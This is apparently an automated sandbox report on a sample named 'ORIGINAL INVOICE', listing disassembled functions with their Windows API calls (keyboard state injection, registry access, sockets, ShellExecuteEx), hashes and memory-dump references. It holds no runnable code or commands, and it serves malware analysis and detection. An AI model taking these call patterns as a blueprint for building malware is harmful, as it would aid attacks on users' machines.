                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: fd32d685484bbfcf6eb0612b28dbf33cca98fe2d6901b91eb53fd9a0f9bc493a
                                                              • Instruction ID: f117c441654e4d9c19c7fa32e9f7366959ee5be88a9d46e501373ab02a38760d
                                                              • Opcode Fuzzy Hash: fd32d685484bbfcf6eb0612b28dbf33cca98fe2d6901b91eb53fd9a0f9bc493a
                                                              • Instruction Fuzzy Hash: FD113071239B53FBE7005F559C83DAA63DCAF26714F20003AF505E5281EBE099F14668
                                                              Function 0023A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0023A806
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 0d860b126d40b5a51f0822d04b8a0ac655c10fa537c839a5940b2de200b16705
                                                              • Instruction ID: 111a99ec7e2fccf4a95d58c1986dfa5352bf4f2f8740279e059d6f82f4029690
                                                              • Opcode Fuzzy Hash: 0d860b126d40b5a51f0822d04b8a0ac655c10fa537c839a5940b2de200b16705
                                                              • Instruction Fuzzy Hash: C5C189B1A1120A9FDB10CF98D485BAEB7B4FF08311F20407AE685E7281D775AA91CF91
                                                              Function 00236B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00236B63
                                                              • LoadStringW.USER32(00000000), ref: 00236B6A
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00236B80
                                                              • LoadStringW.USER32(00000000), ref: 00236B87
                                                              • _wprintf.LIBCMT ref: 00236BAD
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00236BCB
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00236BA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: c7101cfffb3de99893b2e2616de94253777efbff480b2c5f8e0a93e51f3642f9
                                                              • Instruction ID: 265dc8bd1c7e49fb06db7bd4ef9b987c3f10d6a1641e4e8218ab996656504919
                                                              • Opcode Fuzzy Hash: c7101cfffb3de99893b2e2616de94253777efbff480b2c5f8e0a93e51f3642f9
                                                              • Instruction Fuzzy Hash: 530112F65102087FEB11ABA4AD8DEE6777CDB04304F404491B749E6041EA749ED48F74
                                                              Function 00252B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00252BF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 2595220575-0
                                                              • Opcode ID: 7c3a1ffbc7e926fcf6ce40bbccf5568d07e46ba9c1c1419e9fa676dfa80caf6c
                                                              • Instruction ID: 1fc850af8ff6000ddcc28108948d389060f34f7609a5148e0f289428019f5361
                                                              • Opcode Fuzzy Hash: 7c3a1ffbc7e926fcf6ce40bbccf5568d07e46ba9c1c1419e9fa676dfa80caf6c
                                                              • Instruction Fuzzy Hash: A19154712142059FCB00EF14C885B6EB7F5BF99311F04885EF9969B2A2DB30A959CB86
                                                              Function 002495BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • select.WSOCK32 ref: 00249691
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0024969E
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002496C8
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002496E9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 002496F8
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 002497AA
                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0028DC00), ref: 00249765
                                                                • Part of subcall function 0022D2FF: _strlen.LIBCMT ref: 0022D309
                                                              • _strlen.LIBCMT ref: 00249800
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                              • String ID:
                                                              • API String ID: 3480843537-0
                                                              • Opcode ID: 1c4d47eab74bd01c8e7d31f4163d96dd341b2ac85aa3f436e9fa0c8e2f2237bc
                                                              • Instruction ID: b775310474ae06f31da175b012ce8de560db7ec3439aa2fbf13ed948bf940dc7
                                                              • Opcode Fuzzy Hash: 1c4d47eab74bd01c8e7d31f4163d96dd341b2ac85aa3f436e9fa0c8e2f2237bc
                                                              • Instruction Fuzzy Hash: D4812E71114200AFC318EF64DC86E6BB7E8EF99710F104A1DF6599B2A2EB30DD54CB92
                                                              Function 0021A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __mtinitlocknum.LIBCMT ref: 0021A991
                                                                • Part of subcall function 00217D7C: __FF_MSGBANNER.LIBCMT ref: 00217D91
                                                                • Part of subcall function 00217D7C: __NMSG_WRITE.LIBCMT ref: 00217D98
                                                                • Part of subcall function 00217D7C: __malloc_crt.LIBCMT ref: 00217DB8
                                                              • __lock.LIBCMT ref: 0021A9A4
                                                              • __lock.LIBCMT ref: 0021A9F0
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002A6DE0,00000018,00225E7B,?,00000000,00000109), ref: 0021AA0C
                                                              • EnterCriticalSection.KERNEL32(8000000C,002A6DE0,00000018,00225E7B,?,00000000,00000109), ref: 0021AA29
                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 0021AA39
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1422805418-0
                                                              • Opcode ID: e8a312cb8ac239c9e3a139fde19138cfad7315f52e993abd871d4a2797dff46c
                                                              • Instruction ID: 33b37f77874cddca7fcbe3aa99c2331a4d095b0060ea9ad80e2a90226f96a52d
                                                              • Opcode Fuzzy Hash: e8a312cb8ac239c9e3a139fde19138cfad7315f52e993abd871d4a2797dff46c
                                                              • Instruction Fuzzy Hash: DA416B719226069BEB208F68DA887DDB7F0BF21734F148318E425AB2D1D77499E0CF81
                                                              Function 00258ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00258EE4
                                                              • GetDC.USER32(00000000), ref: 00258EEC
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00258EF7
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00258F03
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00258F3F
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00258F50
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0025BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00258F8A
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00258FAA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: b319ad6e227d3aec7f87381fe040ba6424710efae66a71141a10ef5a501bdb13
                                                              • Instruction ID: d36bba161c3e94d0cd25c3ca4034b8b3bc57ef8628d86b981041e07b39319a3f
                                                              • Opcode Fuzzy Hash: b319ad6e227d3aec7f87381fe040ba6424710efae66a71141a10ef5a501bdb13
                                                              • Instruction Fuzzy Hash: E6317F72200214BFEB108F50DC4AFEA3BADEF49716F044065FE0CAA191C6B59851CB74
                                                              Function 00260133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0026016D
                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0026038D
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002603AB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 002603D6
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002603FF
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00260421
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00260440
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                              • String ID:
                                                              • API String ID: 3356174886-0
                                                              • Opcode ID: 2bd86f54617fe52272c4683c0e6a6685f73c7fe325f295b214ed266f792d673b
                                                              • Instruction ID: 86367cf6a0b3cafb4955861086a2d3cf6af4ee0e6da8627a36963922b551eef8
                                                              • Opcode Fuzzy Hash: 2bd86f54617fe52272c4683c0e6a6685f73c7fe325f295b214ed266f792d673b
                                                              • Instruction Fuzzy Hash: 21A1CC30610616EBDB18CF68C9D97AEBBB1BF08701F048255EC58AB290D770ADB0DB90
                                                              Function 0020AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e87d46b65da556792037df3eb6fe82b8081c74fe70b64d64925ed0eb7f68d49
                                                              • Instruction ID: 345c828c46f7fcdc6f8b5a53e75e40057bd682d841c5e15db27399e38c846651
                                                              • Opcode Fuzzy Hash: 0e87d46b65da556792037df3eb6fe82b8081c74fe70b64d64925ed0eb7f68d49
                                                              • Instruction Fuzzy Hash: CF716D7091020AEFCF14CF98CC49EAEBB75FF85314F248149F915AA291C771AA61CF61
                                                              Function 00252230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0025225A
                                                              • _memset.LIBCMT ref: 00252323
                                                              • ShellExecuteExW.SHELL32(?), ref: 00252368
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                                • Part of subcall function 0020C6F4: _wcscpy.LIBCMT ref: 0020C717
                                                              • CloseHandle.KERNEL32(00000000), ref: 0025242F
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0025243E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 4082843840-2766056989
                                                              • Opcode ID: 05ff8fa9941192d40f520c21792e7a796b813b393c7de889170a3706f26e2c13
                                                              • Instruction ID: abac6f347a6dbd2e8b3bc7ddfa90188ef41686cfda7062f1635f8f3f522c4e1d
                                                              • Opcode Fuzzy Hash: 05ff8fa9941192d40f520c21792e7a796b813b393c7de889170a3706f26e2c13
                                                              • Instruction Fuzzy Hash: EC716BB4A10619DFCF04EFA4D885AAEB7B5FF49310F108459E859AB291CB30AD58CF94
                                                              Function 00233DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00233DE7
                                                              • GetKeyboardState.USER32(?), ref: 00233DFC
                                                              • SetKeyboardState.USER32(?), ref: 00233E5D
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00233E8B
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00233EAA
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00233EF0
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00233F13
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: b2d694a75c2ff0dd2cdacd8f6841c140c976c374beed34b44517cd17c0a15be3
                                                              • Instruction ID: a459af421b05eddd82d8a51434b292def177f69be2e238027f9b2beca10b12fd
                                                              • Opcode Fuzzy Hash: b2d694a75c2ff0dd2cdacd8f6841c140c976c374beed34b44517cd17c0a15be3
                                                              • Instruction Fuzzy Hash: C151B4E0A247D63DFB368B248C46BB67EA95F06704F084589F1D9468C2D394EFE4D750
                                                              Function 00233BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00233C02
                                                              • GetKeyboardState.USER32(?), ref: 00233C17
                                                              • SetKeyboardState.USER32(?), ref: 00233C78
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00233CA4
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00233CC1
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00233D05
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00233D26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 2dabdfe158bebd412d529525273119cdc14853f3e28c731f6af0c81e8a26685b
                                                              • Instruction ID: a1dd72cd4f18cbb8db44080514b9ffa956d57017351c0429b4320a8a0b6fbf6f
                                                              • Opcode Fuzzy Hash: 2dabdfe158bebd412d529525273119cdc14853f3e28c731f6af0c81e8a26685b
                                                              • Instruction Fuzzy Hash: DB51E8E05247D63DFB32CB348C46B7ABFA96B06304F088889E0D95A4C2D694EFE4D750
                                                              Function 00237DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: 1594c20b29bdc3e723d29755c890b1b8186c7230881fdf9b6f877d5fb4a01ed4
                                                              • Instruction ID: 1cb50f32e795b732a5b555a3da1639e79a1879720a26b9488c421cbbeb0db744
                                                              • Opcode Fuzzy Hash: 1594c20b29bdc3e723d29755c890b1b8186c7230881fdf9b6f877d5fb4a01ed4
                                                              • Instruction Fuzzy Hash: 9D4152A6C30214B6CF20ABF4C8869CF73ECAF14310F504966E518E3121E675D6B48BE5
                                                              Function 00253D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00253DA1
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00253DCB
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00253E80
                                                                • Part of subcall function 00253D72: RegCloseKey.ADVAPI32(?), ref: 00253DE8
                                                                • Part of subcall function 00253D72: FreeLibrary.KERNEL32(?), ref: 00253E3A
                                                                • Part of subcall function 00253D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00253E5D
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00253E25
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 6d6cbfb23193eae1c20c9408af01e74d4554a758ba71313737760cdff72d20b5
                                                              • Instruction ID: cfb700c1abae9185a8f50c46a0a108f685108529ea171ef9b7fb5965b3b8abe6
                                                              • Opcode Fuzzy Hash: 6d6cbfb23193eae1c20c9408af01e74d4554a758ba71313737760cdff72d20b5
                                                              • Instruction Fuzzy Hash: A4315CB1911109BFDB14CF90DC8AAFFB7BCEF08351F00116AE912E2150D6709F888BA4
                                                              Function 00258FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00258FE7
                                                              • GetWindowLongW.USER32(00C0A1D0,000000F0), ref: 0025901A
                                                              • GetWindowLongW.USER32(00C0A1D0,000000F0), ref: 0025904F
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00259081
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002590AB
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 002590BC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002590D6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 0af8f0ae36845445c5509adeafe42874b49648d16fa7243aaf8471805f5349ad
                                                              • Instruction ID: d952f3379d64ce1c847fc2b55284e5b91589ade5229b5935ba65b379967ca1e3
                                                              • Opcode Fuzzy Hash: 0af8f0ae36845445c5509adeafe42874b49648d16fa7243aaf8471805f5349ad
                                                              • Instruction Fuzzy Hash: DB312834610216DFDB208F58EC88F6437B9FB4A765F140264FA198B2F1CB71A8A4DB45
                                                              Function 002308AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
